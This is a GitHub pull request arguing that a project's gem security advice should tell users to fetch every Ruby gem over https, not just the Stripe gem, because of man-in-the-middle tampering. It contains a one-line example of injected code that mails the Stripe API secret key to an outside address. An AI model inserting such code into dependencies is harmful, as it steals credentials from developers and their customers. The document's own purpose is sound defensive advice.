Join GitHub today
GitHub is home to over 20 million developers working together to host and review code, manage projects, and build software together.
Update gem security advice #63
Requesting stripe gems over https doesn't help you if the other gems in your system (e.g. rails) are fetched over http - a MITM attacker could corrupt any gem fetched over http to compromise the stripe code.
For example, if I was an evil attacker, even if you fetched the stripe gem securely, if you fetched rails over HTTP, I could alter the rails gem to include the code:
key = Stripe.api_key mail to: "firstname.lastname@example.org", subject: "Someone's secret key", body: key
The only way to ensure gem security against a MITM attacker is to ensure all gems are fetched over https, not just some of them.